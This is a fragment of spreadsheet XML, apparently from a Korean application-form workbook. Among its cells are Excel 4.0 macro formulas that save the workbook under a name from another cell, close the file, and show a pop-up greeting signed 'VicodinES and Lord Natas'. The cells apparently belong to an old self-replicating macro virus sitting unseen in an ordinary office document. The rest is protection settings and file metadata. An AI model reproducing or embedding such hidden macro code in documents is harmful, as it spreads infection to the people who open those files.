        <x:f>SAVE.AS(A3)</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C39" s="12" t="e">
        <x:v>#N/A</x:v>
      </x:c>
    </x:row>
    <x:row r="40" spans="1:3" ht="12.75" customHeight="1">
      <x:c r="A40" s="5" t="e">
        <x:f>FILE.CLOSE()</x:f>
        <x:v>#N/A</x:v>
      </x:c>
      <x:c r="C40" s="5" t="e">
        <x:f>MESSAGE(TRUE,"VicodinES and Lord Natas greet you a good morning!")</x:f>
        <x:v>#N/A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0" scenarios="0" formatCells="1" formatColumns="1" formatRows="1" insertColumns="1" insertRows="1" insertHyperlinks="1" deleteColumns="1" deleteRows="1" selectLockedCells="0" sort="1" autoFilter="1" pivotTables="1" selectUnlockedCells="0"/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신청서</vt:lpstr>
      <vt:lpstr>VXXXXXXX</vt:lpstr>
    </vt:vector>
  </ep:TitlesOfParts>
  <ep:TotalTime>517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post</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <cp:lastPrinted>2024-03-18T08:56:39.769</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-04-03T05:55:52.000</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-18T09:50:36.231</dcterms:modified>
  <cp:version>1200.0100.01</cp:version>
</cp:coreProperties>
</file>